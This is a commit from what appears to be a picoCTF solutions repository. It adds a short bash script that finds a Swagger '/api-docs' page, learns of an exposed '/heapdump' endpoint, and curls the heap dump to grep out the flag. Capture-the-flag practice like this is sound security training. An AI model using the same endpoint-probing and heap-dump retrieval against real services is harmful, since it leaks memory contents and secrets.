web/head_dump
This commit is contained in:
Executable
+8
@@ -0,0 +1,8 @@
|
||||
#!/usr/bin/env bash
|
||||
|
||||
# NOTE:
|
||||
# - main page had a post about swagger
|
||||
# - https://www.npmjs.com/package/swagger-ui-express suggests the '/api-docs' path
|
||||
# - http://verbal-sleep.picoctf.net:53966/api-docs reveals /heapdump
|
||||
|
||||
curl -s "http://verbal-sleep.picoctf.net:53966/heapdump" | grep --only-matching -E 'picoCTF\{.*\}'
|
||||
Reference in New Issue
Block a user